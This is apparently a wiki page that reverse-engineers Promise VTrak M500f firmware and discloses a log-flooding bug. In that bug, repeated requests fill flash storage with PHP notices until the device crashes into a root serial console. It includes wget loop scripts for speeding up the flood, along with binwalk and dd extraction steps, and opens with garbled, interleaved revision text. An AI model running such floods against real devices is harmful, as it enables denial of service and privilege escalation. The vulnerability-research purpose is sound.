lrwxrwxrwx 1 root root      18 Mar  3 03:51 libcrypto.so.0 -> libcrypto.so.0.9.7
-rwxr-xr-x 1 root root 1073256 Mar  3 03:40 libcrypto.so.0.9.7
-rwxr-xr-x 1 root root  33364 Mar  3 03:51 libNamespaceProvider.so.1
lrwxrwxrwx 1 root root      24 Mar  3 03:51 libnetsnmpagent.so -> libnetsnmpagent.so.5.0.8
lrwxrwxrwx 1 root root      24 Mar  3 03:51 libnetsnmpagent.so.5 -> libnetsnmpagent.so.5.0.8
-rwxr-xr-x 1 root root  172064 Mar  3 03:44 libnetsnmpagent.so.5.0.8
lrwxrwxrwx 1 root root      26 Mar  3 03:51 libnetsnmphelpers.so -> libnetsnmphelpers.so.5.0.8
lrwxrwxrwx 1 root root      26 Mar  3 03:51 libnetsnmphelpers.so.5 -> libnetsnmphelpers.so.5.0.8
-rwxr-xr-x 1 root root  146688 Mar  3 03:44 libnetsnmphelpers.so.5.0.8
lrwxrwxrwx 1 root root      23 Mar  3 03:51 libnetsnmpmibs.so -> libnetsnmpmibs.so.5.0.8
lrwxrwxrwx 1 root root      23 Mar  3 03:51 libnetsnmpmibs.so.5 -> libnetsnmpmibs.so.5.0.8
-rwxr-xr-x 1 root root  154508 Mar  3 03:44 libnetsnmpmibs.so.5.0.8
lrwxrwxrwx 1 root root      19 Mar  3 03:51 libnetsnmp.so -> libnetsnmp.so.5.0.8
lrwxrwxrwx 1 root root      19 Mar  3 03:51 libnetsnmp.so.5 -> libnetsnmp.so.5.0.8
-rwxr-xr-x 1 root root  502156 Mar  3 03:44 libnetsnmp.so.5.0.8
-rwxr-xr-x 1 root root  67420 Mar  3 03:51 libpegauthentication.so.1
-rwxr-xr-x 1 root root  354380 Mar  3 03:51 libpegclient.so.1
-rwxr-xr-x 1 root root  115152 Mar  3 03:51 libpegcliutils.so.1
-rwxr-xr-x 1 root root 1963312 Mar  3 03:51 libpegcommon.so.1
-rwxr-xr-x 1 root root  295900 Mar  3 03:51 libpegconfig.so.1
-rwxr-xr-x 1 root root  70012 Mar  3 03:51 libpegexportclient.so.1
-rwxr-xr-x 1 root root  154236 Mar  3 03:51 libpegexportserver.so.1
-rwxr-xr-x 1 root root  119444 Mar  3 03:51 libpeggetoopt.so.1
-rwxr-xr-x 1 root root  53860 Mar  3 03:51 libpeghandlerservice.so.1
-rwxr-xr-x 1 root root  299944 Mar  3 03:51 libpegindicationservice.so.1
-rwxr-xr-x 1 root root  179504 Mar  3 03:51 libpegprm.so.1
-rwxr-xr-x 1 root root  308692 Mar  3 03:51 libpegprovidermanager.so.1
-rwxr-xr-x 1 root root  134724 Mar  3 03:51 libpegprovider.so.1
-rwxr-xr-x 1 root root  158000 Mar  3 03:51 libpegquerycommon.so.1
-rwxr-xr-x 1 root root  25348 Mar  3 03:51 libpegqueryexpression.so.1
-rwxr-xr-x 1 root root  315808 Mar  3 03:51 libpegrepository.so.1
-rwxr-xr-x 1 root root  641748 Mar  3 03:51 libpegserver.so.1
-rwxr-xr-x 1 root root  102472 Mar  3 03:51 libpegservice.so.1
-rwxr-xr-x 1 root root  73204 Mar  3 03:51 libpeguser.so.1
-rwxr-xr-x 1 root root  100468 Mar  3 03:51 libpegwql.so.1
lrwxrwxrwx 1 root root      15 Mar  3 03:51 libslp.so -> libslp.so.1.0.0
lrwxrwxrwx 1 root root      15 Mar  3 03:51 libslp.so.1 -> libslp.so.1.0.0
-rwxr-xr-x 1 root root  143646 Mar  3 03:37 libslp.so.1.0.0
lrwxrwxrwx 1 root root      11 Mar  3 03:51 libssl.so -> libssl.so.0
lrwxrwxrwx 1 root root      15 Mar  3 03:51 libssl.so.0 -> libssl.so.0.9.7
-rwxr-xr-x 1 root root  179508 Mar  3 03:40 libssl.so.0.9.7
-rwxr-xr-x 1 root root  134640 Mar  3 03:51 libUserAuthProvider.so.1
 
part5/usr/local:
total 0
 
part5/usr/man:
total 0
 
part5/usr/sbin:
total 17
lrwxrwxrwx 1 root root    12 Mar  3 03:51 chroot -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 clitelnetd -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 crond -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 inetd -> /bin/busybox
lrwxrwxrwx 1 root root    12 Mar  3 03:51 rdate -> /bin/busybox
-rwxr-xr-x 1 root root 16232 Mar  3 03:42 stunnel
lrwxrwxrwx 1 root root    12 Mar  3 03:51 telnetd -> /bin/busybox
 
part5/usr/share:
total 1
drwxr-xr-x 2 root root 1024 Apr 14  2006 udhcpc
 
part5/usr/share/udhcpc:
total 6
-rwxr-xr-x 1 root root 588 Aug 29  2003 bound
-rwxr-xr-x 1 root root  77 Aug 29  2003 deconfig
-rwxr-xr-x 1 root root 264 Aug 29  2003 default.script
-rwxr-xr-x 1 root root  31 Apr 14  2006 leasefail
-rwxr-xr-x 1 root root  68 Aug 29  2003 nak
-rwxr-xr-x 1 root root 588 Aug 29  2003 renew
 
part5/var:
total 2
drwxr-xr-x 2 root root 1024 Mar  3 03:37 log
drwxr-xr-x 2 root root 1024 Mar  3 03:37 run
 
part5/var/log:
total 0


part5/var/run:
The directory /islavista/flash seems to be the upload destination for firmware updates via the webinterface.
total 0
The filesystem in Part 6 gets mounted to /oem.
</pre>


==== part 6 ====
So where do the juicy bits come from? Let's binwalk part1:
<pre>
<pre>
dd if=iv2p_all_20110303_16mb.img bs=1 skip=11309493 count=1572540 of=part6.cramfs
$binwalk -av -x MIPSE part1
mkdir part6/
mount -o loop part6.cramfs part6/
ls -lR part6/
</pre>
</pre>
<pre>
[[Promise VTrak M500f Firmware/part1|binwalk output]]
part6/:
total 1
drwxr-xr-x 1 root root 88 Jan  1  1970 fw
drwxr-xr-x 1 root root 72 Jan  1  1970 sw
 
part6/fw:
total 514
-rw-r--r-- 1 root root 393216 Jan  1  1970 evtinfo.conf
-rw-r--r-- 1 root root 131072 Jan  1  1970 evtlogloc.conf
-rw-r--r-- 1 root root  1616 Jan  1  1970 OEMCoercionTable.conf
 
part6/sw:
total 3
drwxr-xr-x 1 root root  40 Jan  1  1970 cli
drwxr-xr-x 1 root root  48 Jan  1  1970 event
drwxr-xr-x 1 root root 132 Jan  1  1970 gui
-rw-r--r-- 1 root root 661 Jan  1  1970 oem.xml
 
part6/sw/cli:
total 1
-rw-r--r-- 1 root root 306 Jan  1  1970 clioem.xml
drwxr-xr-x 1 root root  24 Jan  1  1970 clu
 
part6/sw/cli/clu:
total 80
-rw-r--r-- 1 root root 81901 Jan  1  1970 cluhelp.txt


part6/sw/event:
We're still looking for 2 CramFS and 1 JFFS2...
total 141
-rw-r--r-- 1 root root 122361 Jan  1  1970 event_EN.xml
-rw-r--r-- 1 root root  21440 Jan  1  1970 event.rng


part6/sw/gui:
== Todo ==
total 6
* Find the page that will throw the most errors, to speed up filling the flash.
-rw-r--r-- 1 1023 232  734 Jan  1  1970 common.js
* Privilege Escalation is already nice, how about Remote Privilege Escalation? Confirm that this also works when using Telnet, not only serial console!
drw-r--r-- 1 1023 232  64 Jan  1  1970 css
* Where's that php.ini hidden in the firmware? Can't be found in any of the firmware parts, yet - maybe generated at runtime? Hmm, hmm, hmm.
drw------- 1 1023 232 1096 Jan  1  1970 enclosureImages
* Analyze the firmware of different models/series. Code recycling FTW!
drw------- 1 1023 232  788 Jan  1  1970 icons
drw------- 1 1023 232  700 Jan  1  1970 images
drw------- 1 1023 232  640 Jan  1  1970 languages


part6/sw/gui/css:
total 8
-rw-r--r-- 1 1023 232 1473 Jan  1  1970 help.css
-rw-r--r-- 1 1023 232 4046 Jan  1  1970 main.css
-rw-r--r-- 1 1023 232 1959 Jan  1  1970 text1.css


part6/sw/gui/enclosureImages:
total 595
-rwxr--r-- 1 1023 232  9102 Jan  1  1970 backEchassis.gif
-rwxr--r-- 1 1023 232  2886 Jan  1  1970 backEctrl.gif
-rwxr--r-- 1 1023 232  2687 Jan  1  1970 backJctrl.gif
-rwxr--r-- 1 1023 232  1584 Jan  1  1970 batterybad.gif
-rwxr--r-- 1 1023 232  1580 Jan  1  1970 batterycritical.gif
-rwxr--r-- 1 1023 232  1448 Jan  1  1970 batterygood.gif
-rwxr--r-- 1 1023 232  2752 Jan  1  1970 blowerbad.gif
-rwxr--r-- 1 1023 232  2831 Jan  1  1970 blowergood.gif
-rwxr--r-- 1 1023 232  1891 Jan  1  1970 blowerstop.gif
-rwxr--r-- 1 1023 232 69881 Jan  1  1970 chassisE300.gif
-rwxr--r-- 1 1023 232 70316 Jan  1  1970 chassisJ300.gif
-rwxr--r-- 1 1023 232 71104 Jan  1  1970 chassisVtrak2U_FC.gif
-rwxr--r-- 1 1023 232 70420 Jan  1  1970 chassisVtrak2U_iSCSI.gif
-rwxr--r-- 1 1023 232 70894 Jan  1  1970 chassisVtrak2U_SCSI.gif
-rwxr--r-- 1 1023 232 81885 Jan  1  1970 chassisVtrak.gif
-rwxr--r-- 1 1023 232  111 Jan  1  1970 ledGrayFlash.gif
-rwxr--r-- 1 1023 232    98 Jan  1  1970 ledGray.gif
-rwxr--r-- 1 1023 232  111 Jan  1  1970 ledGreenFlash.gif
-rwxr--r-- 1 1023 232    98 Jan  1  1970 ledGreen.gif
-rwxr--r-- 1 1023 232  111 Jan  1  1970 ledRedFlash.gif
-rwxr--r-- 1 1023 232    98 Jan  1  1970 ledRed.gif
-rwxr--r-- 1 1023 232  111 Jan  1  1970 ledYellowFlash.gif
-rwxr--r-- 1 1023 232    98 Jan  1  1970 ledYellow.gif
-rwxr--r-- 1 1023 232  3635 Jan  1  1970 psbad.gif
-rwxr--r-- 1 1023 232  3184 Jan  1  1970 pscritical.gif
-rwxr--r-- 1 1023 232  4905 Jan  1  1970 psfanbad.gif
-rwxr--r-- 1 1023 232  4862 Jan  1  1970 psfangood.gif
-rwxr--r-- 1 1023 232  3169 Jan  1  1970 psfanstop.gif
-rwxr--r-- 1 1023 232  6391 Jan  1  1970 psgood.gif
-rwxr--r-- 1 1023 232 65476 Jan  1  1970 S200p.gif
-rwxr--r-- 1 1023 232  1049 Jan  1  1970 tmpbad.gif
-rwxr--r-- 1 1023 232  883 Jan  1  1970 tmpcritical.gif
-rwxr--r-- 1 1023 232  1395 Jan  1  1970 tmpgood.gif
-rwxr--r-- 1 1023 232  181 Jan  1  1970 voltagebad.gif
-rwxr--r-- 1 1023 232  184 Jan  1  1970 voltagecritical.gif
-rwxr--r-- 1 1023 232  177 Jan  1  1970 voltagegood.gif
-rwxr--r-- 1 1023 232 11085 Jan  1  1970 VtrakFront12.gif
-rwxr--r-- 1 1023 232  8107 Jan  1  1970 VtrakFront8.gif
-rwxr--r-- 1 1023 232 21199 Jan  1  1970 VtrakFront.gif


part6/sw/gui/icons:
== Thanks ==
total 18
* Mathis Schmieder for the ''fsck.cramfs'' tip, i was a bit lost when i discovered the errors in Part 3
-rwxr--r-- 1 1023 232 179 Jan  1  1970 admin.gif
* Joris from Promise Technology, he was the one that eventually understood what i was trying to tell them all the time
-rwxr--r-- 1 1023 232 249 Jan  1  1970 array.gif
-rwxr--r-- 1 1023 232 275 Jan  1  1970 arrays.gif
-rwxr--r-- 1 1023 232  96 Jan  1  1970 arrowdn.gif
-rwxr--r-- 1 1023 232  99 Jan  1  1970 arrowrt.gif
-rwxr--r-- 1 1023 232 952 Jan  1  1970 controller.gif
-rwxr--r-- 1 1023 232 971 Jan  1  1970 controllers.gif
-rwxr--r-- 1 1023 232 148 Jan  1  1970 enclosure.gif
-rwxr--r-- 1 1023 232 152 Jan  1  1970 enclosures.gif
-rwxr--r-- 1 1023 232 131 Jan  1  1970 fdminus1.gif
-rwxr--r-- 1 1023 232 132 Jan  1  1970 fdminus.gif
-rwxr--r-- 1 1023 232 132 Jan  1  1970 fdplus1.gif
-rwxr--r-- 1 1023 232 137 Jan  1  1970 fdplus.gif
-rwxr--r-- 1 1023 232 120 Jan  1  1970 iconCritical.gif
-rwxr--r-- 1 1023 232 129 Jan  1  1970 iconDead.gif
-rwxr--r-- 1 1023 232 103 Jan  1  1970 icon.gif
-rwxr--r-- 1 1023 232 147 Jan  1  1970 iscsi.gif
-rwxr--r-- 1 1023 232 176 Jan  1  1970 logdrv.gif
-rwxr--r-- 1 1023 232 178 Jan  1  1970 logdrvs.gif
-rwxr--r-- 1 1023 232 192 Jan  1  1970 net.gif
-rwxr--r-- 1 1023 232 172 Jan  1  1970 phydrv.gif
-rwxr--r-- 1 1023 232 183 Jan  1  1970 phydrvs.gif
-rwxr--r-- 1 1023 232 177 Jan  1  1970 spare.gif
-rwxr--r-- 1 1023 232 190 Jan  1  1970 spares.gif
-rwxr--r-- 1 1023 232 177 Jan  1  1970 storage.gif
-rwxr--r-- 1 1023 232 193 Jan  1  1970 subsystem.gif
-rwxr--r-- 1 1023 232 201 Jan  1  1970 subsystems.gif
-rwxr--r-- 1 1023 232 155 Jan  1  1970 sw.gif
-rwxr--r-- 1 1023 232  55 Jan  1  1970 tab0.gif
-rwxr--r-- 1 1023 232 111 Jan  1  1970 tab1.gif
-rwxr--r-- 1 1023 232 115 Jan  1  1970 tab2.gif
-rwxr--r-- 1 1023 232 113 Jan  1  1970 tab.gif
-rwxr--r-- 1 1023 232 170 Jan  1  1970 user.gif


part6/sw/gui/images:
total 91
-rwxr--r-- 1 1023 232    97 Jan  1  1970 arrowdn.gif
-rwxr--r-- 1 1023 232  117 Jan  1  1970 ball-1.gif
-rwxr--r-- 1 1023 232    51 Jan  1  1970 ball-2.gif
-rwxr--r-- 1 1023 232  117 Jan  1  1970 ball-dn.gif
-rwxr--r-- 1 1023 232  118 Jan  1  1970 ball-rt.gif
-rwxr--r-- 1 1023 232  143 Jan  1  1970 bg.gif
-rwxr--r-- 1 1023 232    52 Jan  1  1970 blank.gif
-rwxr--r-- 1 1023 232  158 Jan  1  1970 HELP_01.gif
-rwxr--r-- 1 1023 232  148 Jan  1  1970 HELP_01-over.gif
-rwxr--r-- 1 1023 232  1570 Jan  1  1970 home-img01.gif
-rwxr--r-- 1 1023 232 14526 Jan  1  1970 home-img02.jpg
-rwxr--r-- 1 1023 232  696 Jan  1  1970 home-img03.gif
-rwxr--r-- 1 1023 232  4398 Jan  1  1970 home-img04.jpg
-rwxr--r-- 1 1023 232  1673 Jan  1  1970 home-img05.gif
-rwxr--r-- 1 1023 232  125 Jan  1  1970 home-img07.gif
-rwxr--r-- 1 1023 232  103 Jan  1  1970 home-img08.gif
-rwxr--r-- 1 1023 232  429 Jan  1  1970 home-img09.gif
-rwxr--r-- 1 1023 232  450 Jan  1  1970 line-1.gif
-rwxr--r-- 1 1023 232 47925 Jan  1  1970 login.gif
-rwxr--r-- 1 1023 232  7399 Jan  1  1970 logo.gif
-rwxr--r-- 1 1023 232  102 Jan  1  1970 select.gif
-rwxr--r-- 1 1023 232  105 Jan  1  1970 sortdn.gif
-rwxr--r-- 1 1023 232  105 Jan  1  1970 sortup.gif
-rwxr--r-- 1 1023 232  100 Jan  1  1970 tabl0.gif
-rwxr--r-- 1 1023 232  100 Jan  1  1970 tabl1.gif
-rwxr--r-- 1 1023 232  100 Jan  1  1970 tabr0.gif
-rwxr--r-- 1 1023 232  100 Jan  1  1970 tabr1.gif
-rwxr--r-- 1 1023 232  2201 Jan  1  1970 tree-bg.jpg


part6/sw/gui/languages:
EOF
total 1433
-rwxr--r-- 1 1023 232  3442 Jan  1  1970 de_DE_Contact.html
-rwxr--r-- 1 1023 232 171315 Jan  1  1970 de_DE_Messages.properties
-rwxr--r-- 1 1023 232  3004 Jan  1  1970 en_US_Contact.html
-rwxr--r-- 1 1023 232 157111 Jan  1  1970 en_US_Messages.properties
-rwxr--r-- 1 1023 232 181154 Jan  1  1970 es_ES_Messages.properties
-rwxr--r-- 1 1023 232  3507 Jan  1  1970 fr_FR_Contact.html
-rwxr--r-- 1 1023 232 177830 Jan  1  1970 fr_FR_Messages.properties
-rwxr--r-- 1 1023 232  3624 Jan  1  1970 it_IT_Contact.html
-rwxr--r-- 1 1023 232 171473 Jan  1  1970 it_IT_Messages.properties
-rwxr--r-- 1 1023 232  3406 Jan  1  1970 ja_JP_Contact.html
-rwxr--r-- 1 1023 232 157225 Jan  1  1970 ja_JP_Messages.properties
-rwxr--r-- 1 1023 232  3314 Jan  1  1970 ko_KR_Contact.html
-rwxr--r-- 1 1023 232 150013 Jan  1  1970 ko_KR_Messages.properties
-rwxr--r-- 1 1023 232  3847 Jan  1  1970 langList.php
-rwxr--r-- 1 1023 232  3161 Jan  1  1970 zh_CN_Contact.html
-rwxr--r-- 1 1023 232 132793 Jan  1  1970 zh_CN_Messages.properties
-rwxr--r-- 1 1023 232  3139 Jan  1  1970 zh_TW_Contact.html
-rwxr--r-- 1 1023 232 133382 Jan  1  1970 zh_TW_Messages.properties
</pre>

Latest revision as of 20:10, 26 August 2016

Template:TOCright

Exploit

I'm using a Promise VTrak M500f storage at work, and every couple of weeks it crashes. Updating to the latest firmware didn't help much.

It always starts with the device's webserver being unresponsive, and not much later the whole device just breaking down.

Usually, when i notice that the device starts to act up again, i just reboot it and it's fine for the next couple of weeks.

To do this, i log in on the serial console and run: 

administrator@cli> shutdown -a restart

So the last time this happened, i noticed something is different with the CLI over serial console... it was... way more interesting!


Oh, exploitable!

Here's one of the problem sources: in line 23 and 24 of /islavista/sw/php/promise/language.php, which is included in the code that's executed when you access the device's WebPAM PROe webinterface, PHP is told to get the language of the user's browser from a header that the browser sends on each request.

No problem there, your browser provides this header, so you probably won't ever see any error from this code.

But if you're using a monitoring tool like Nagios, to check if the webinterface is still alive, your Nagios check doesn't send that header and PHP will throw an error of the level E_NOTICE. 

$ php -a
Interactive mode enabled

<?php
preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches);
    $lang=$matches[1];
    switch(substr($lang,0,2))
    {
      case 'en':
   $language='en_US';
        break;
      // [...]
      default:
        $language='en_US';
        break;
    }
?>
PHP Notice:  Undefined index: HTTP_ACCEPT_LANGUAGE in - on line 2
PHP Notice:  Undefined offset: 1 in - on line 3

Of course, being the good developer that you are, you hide those errors, should they ever arise at all, from the user - and only write them to a logfile somewhere on your device's internal flash. 

[08-Jul-2011 19:52:24] PHP Notice:  Undefined index:  HTTP_ACCEPT_LANGUAGE in /islavista/sw/php/promise/language.php on line 23
[08-Jul-2011 19:52:24] PHP Notice:  Undefined offset:  1 in /islavista/sw/php/promise/language.php on line 24
[08-Jul-2011 19:52:26] PHP Notice:  Undefined index:  HTTP_HOST in /islavista/sw/php/promise/index.php on line 182

Being a bit unsure yourself of how good of a developer you really are, you tell PHP in its config file /islavista/conf/sw/php.ini to not only log real errors of the levels E_WARNING or E_ERROR, or like the healthy default recommends, "E_ALL & ~E_NOTICE" (everything except E_NOTICE)... no, you want them all, so you can write impeccable code!

Have you ever wondered why it's called "default" setting? The De-Fault setting? Also known as the "Please don't break anything!" setting? You'll find out soon.

So, your Nagios checks the webserver every 5 minutes, every hour of the day, every day of the week, etc., and every time there are a couple of lines appended to the logfile, because you want to be in control an see each and any issue in you code.

Now what would you think will happen if that logfile gets so big that there is no space left on that flash?

I can tell you what will happen: 

islavista> _

When i told Promise about the issue, one of their support engineers had only this to say: 

"I just can repeat [to] you one more time, you should not even know the word 'islavista' related to this device."

Okay, that was a lie, it wasn't the only thing he said. He added: 

"You need a new controller."

O RLY? I don't think that replacing my hardware will fix an issue in your firmware.

(Speaking of which, i'm still unsure if i should publish the whole conversation via their ticketing system, that will be pretty embarassing for them... they tried to convince me that my hardware is faulty and needs to be replaced. Yeah, right.)


Privilege Escalation

The 3 lines per request equal 354 Bytes of text, and my storage crashed when the logfile was roughly 3.5 MB in size, so in theory ~10.000 requests are all that's needed for this exploit to work its magic.

Nagios checks every 5 minutes, that's 288 requests per day, which means that after ~35 days the log should have filled all available space.

Can we speed this up? Yes, we can. A wget request to the webinterface takes me an average of 6 seconds, so with the following simple script i can get ~14400 requests per day, which means it takes ~17 hours fill all available space. 

$ while [ true ]; do wget -O /dev/null "http://192.168.0.2"; done

Check the webinterface from time to time, when you see an PHP error that it couldn't write it's session because /tmp is full, you're golden! Fire up you serial console and enjoy.

You can automate this, too: 

$ while [ true ]; do if `lynx --dump "http://192.168.0.2/" | grep -q "tmp"`; then echo "EOF" | mail -s 'Exploit ready!' you@example.com; break; fi; done

Remote Privilege Escalation, too?

Still unconfirmed, but in theory this should also work over Telnet instead of the serial console, provided that Telnet is enabled on the device.



Firmware

Getting Started

Download the most recent firmware, at the time of this writing it was v2.39, and also make sure you have binwalk installed, an incredibly helpful tool when analyzing firmware files:


Analyzing the Firmware file

Use binwalk to look for the addresses of files within the firmware file: 

$ binwalk -v iv2p_all_20110303_16mb.img

This gives you a nice table with the decimal offset of each file in the firmware, and also the most likely format of this file: 

Scan Time:    Aug 03, 2011 @ 20:13:21
Magic File:   /etc/binwalk/magic.binwalk
Signatures:   67
Target File:  iv2p_all_20110303_16mb.img
MD5 Checksum: b8dad677c907a53ca9b222f2103c13b3

DECIMAL         HEX             DESCRIPTION
-------------------------------------------------------------------------------------------------------
18204           0x471C          gzip compressed data, from Unix, last modified: Thu Apr 20 05:12:30 2006, max compression
871968          0xD4E20         Linux Compressed ROM filesystem data, little endian size 2584576 version #2 sorted_dirs, CRC 0xeeb623f0, edition 0, 1217 blocks, 7 files
3456544         0x34BE20        Linux Compressed ROM filesystem data, little endian size 3231744 version #2 sorted_dirs, CRC 0xf1e0771a, edition 0, 2870 blocks, 946 files
3528967         0x35D907        bzip2 compressed data
6688288         0x660E20        gzip compressed data, from Unix, last modified: Thu Mar  3 03:51:40 2011, max compression
11309493        0xAC91B5        Linux Compressed ROM filesystem data, little endian size 1277952 version #2 sorted_dirs, CRC 0x477edaab, edition 0, 802 blocks, 142 files
12882033        0xC49071        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
13215338        0xC9A66A        LZMA compressed data, properties: 0x85, dictionary size: 740294656 bytes, uncompressed size: 16388 bytes
13216042        0xC9A92A        LZMA compressed data, properties: 0x86, dictionary size: 745537536 bytes, uncompressed size: 16388 bytes
13216734        0xC9ABDE        LZMA compressed data, properties: 0x89, dictionary size: 747110400 bytes, uncompressed size: 16388 bytes
13219257        0xC9B5B9        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
13220658        0xC9BB32        LZMA compressed data, properties: 0x95, dictionary size: 272629760 bytes, uncompressed size: 16387 bytes
13221334        0xC9BDD6        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
13221354        0xC9BDEA        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes

Extracting the Firmware parts

The principle is pretty simple: use dd to read a segment from the firmware (if=), using a blocksize (bs=) of 1, starting (skip=) at the decimal offset of the file you want, with a length (count=) of "the next file's offset minus this file's offset" and write it to an ouput file (of=). It makes it a lot easier if you give the output file the extension of the filetype that binwalk tells you.


Part 1

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=18204 count=853764 of=part1.gz
$ gunzip part1.gz
$ file part1

part1: data

Probably the kernel and initrd?


Part 2

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=871968 count=2584576 of=part2.cramfs
$ mkdir part2
$ mount -o loop parts2.cramfs part2/
$ ls -l part2/

total 4858
-rw-r--r-- 1 root root   18204 Jan  1  1970 iodrv.o
-rw-r--r-- 1 root root  233655 Jan  1  1970 Marvell.o
-rw-r--r-- 1 root root  470713 Jan  1  1970 qla4xxx.o
-rw-r--r-- 1 root root 3193368 Jan  1  1970 raid_core.o
-rw-r--r-- 1 root root  436560 Jan  1  1970 scsi.o
-rw-r--r-- 1 root root  619697 Jan  1  1970 xfc.o

Kernel modules, boooring!


Part 3

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=72423 of=part3.cramfs
$ mount -o loop part3.cramfs part3/
$ ls -lR part3/

Full contents of Part 3

The webinterface and some non-standard binaries, so this must be their own code.

When accessing a file you'll get an error, though. Quick check: 

$ fsck.cramfs part3.cramfs

fsck.cramfs: file length too short

Damn.


Part 4

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3528967 count=3159321 of=part4.bz2
$ bunzip2 part4.bz2

bunzip2: part4.bz2 is not a bzip2 file.

Hmm, strange.


Part 5

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=6688288 count=4621205 of=part5.gz
$ gunzip part5.gz
$ file part5

part5: Linux rev 1.0 ext2 filesystem data, UUID=1e4f9d2b-b406-4a38-bbf8-8f1fcf52e5c7

So it's a gzip, but that contains an ext2 partition. 

$ mv part5 part5.ext2
$ mkdir part5
$ mount -o loop part5.ext2 part5/
$ ls -lR part5/

Full contents of Part 5

BusyBox, libraries, you name it. This must be the base Linux part.

Part 6

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=11309493 count=1572540 of=part6.cramfs
$ mkdir part6/
$ mount -o loop part6.cramfs part6/
$ ls -lR part6/

Full contents of Part 6

fw and sw, this is probably the interesting stuff? But where's the /islavista/conf/sw/php.ini?

Fixing Part 3

Part 3 is a broken CramFS, and Part 4 is a bzip2 file that is not a bzip2 file... smells fishy. Let's say Part 3 is actually Part 3.1 and Part 4 is Part 3.2: 

$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=3231744 of=part3.cramfs
$ fsck.cramfs -v part3.cramfs

cramfs endianness is little
part3.cramfs: OK

Bingo!

The Missing Link

There are a lot of strings throughout the fimware that point at 4 MTD blocks which get mounted into the /islavista/conf, /islavista/fw, /islavista/sw and /oem directories.

Finding the contents of those blocks that gets written to the flash is the interesting part... 

/dev/mtdblock5  /islavista/fw       cramfs  suid,dev,exec,auto,nouser,async,ro
/dev/mtdblock6  /islavista/sw       cramfs  suid,dev,exec,auto,nouser,async,ro
/dev/mtdblock2  /islavista/conf     jffs2   defaults
/dev/mtdblock7  /oem                cramfs  suid,dev,exec,auto,nouser,async,ro

The directory /islavista/flash seems to be the upload destination for firmware updates via the webinterface. The filesystem in Part 6 gets mounted to /oem.

So where do the juicy bits come from? Let's binwalk part1: 

$binwalk -av -x MIPSE part1

binwalk output

We're still looking for 2 CramFS and 1 JFFS2...

Todo

  • Find the page that will throw the most errors, to speed up filling the flash.
  • Privilege Escalation is already nice, how about Remote Privilege Escalation? Confirm that this also works when using Telnet, not only serial console!
  • Where's that php.ini hidden in the firmware? Can't be found in any of the firmware parts, yet - maybe generated at runtime? Hmm, hmm, hmm.
  • Analyze the firmware of different models/series. Code recycling FTW!


Thanks

  • Mathis Schmieder for the fsck.cramfs tip, i was a bit lost when i discovered the errors in Part 3
  • Joris from Promise Technology, he was the one that eventually understood what i was trying to tell them all the time


EOF

Retrieved from "https://wiki.faked.org/index.php?title=Promise_VTrak_M500f&oldid=326"